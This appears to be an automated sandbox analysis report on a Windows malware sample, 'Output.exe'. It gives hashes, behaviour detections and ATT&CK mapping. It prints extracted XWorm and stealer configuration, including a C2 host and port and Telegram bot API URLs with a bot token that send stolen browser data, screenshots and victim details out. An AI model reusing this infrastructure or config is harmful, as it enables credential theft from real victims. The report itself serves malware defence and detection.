General
-
Target
Output.exe
-
Size
11.6MB
-
Sample
240930-nl7xksxckh
-
MD5
d7c99b9559332b8652b2cf85c34f1dea
-
SHA1
cbd247890c862d964683f8dc81cc3d7747bdfb73
-
SHA256
53d398e45aaad1c1cbbb4be5abd2a0d2c039b746792fb63bd8b9b28aebf359ca
-
SHA512
184945ec88ebe3e3ec5e3a71b9870b3459a0bb37491a665f356d3cb7286e0e79bed44a19e21cceba0fe0ec07a1d89e2238c70b06bd9c5dc5956b7715e8a8911f
-
SSDEEP
196608:tO3ytpGu2gWR5fMEseOI8LG8Ac+g6sFZstcVw8q1Q6HmVF:tO3j5gWR5fBSI58t+gbZst9
Static task
static1
Behavioral task
behavioral1
Sample
Output.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Output.exe
Resource
win10v2004-20240802-en
Malware Config
Extracted
xworm
reason-warnings.gl.at.ply.gg:20382
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
gurcu
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendMessage?chat_id=-4594364141
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/getUpdates?offset=-
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4590251468&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4594364141&caption=%F0%9F%93%B8Screenshot%20take
Targets
-
-
Target
Output.exe
-
Size
11.6MB
-
MD5
d7c99b9559332b8652b2cf85c34f1dea
-
SHA1
cbd247890c862d964683f8dc81cc3d7747bdfb73
-
SHA256
53d398e45aaad1c1cbbb4be5abd2a0d2c039b746792fb63bd8b9b28aebf359ca
-
SHA512
184945ec88ebe3e3ec5e3a71b9870b3459a0bb37491a665f356d3cb7286e0e79bed44a19e21cceba0fe0ec07a1d89e2238c70b06bd9c5dc5956b7715e8a8911f
-
SSDEEP
196608:tO3ytpGu2gWR5fMEseOI8LG8Ac+g6sFZstcVw8q1Q6HmVF:tO3j5gWR5fBSI58t+gbZst9
-
Detect Xworm Payload
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Loads dropped DLL
-
Adds Run key to start application
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1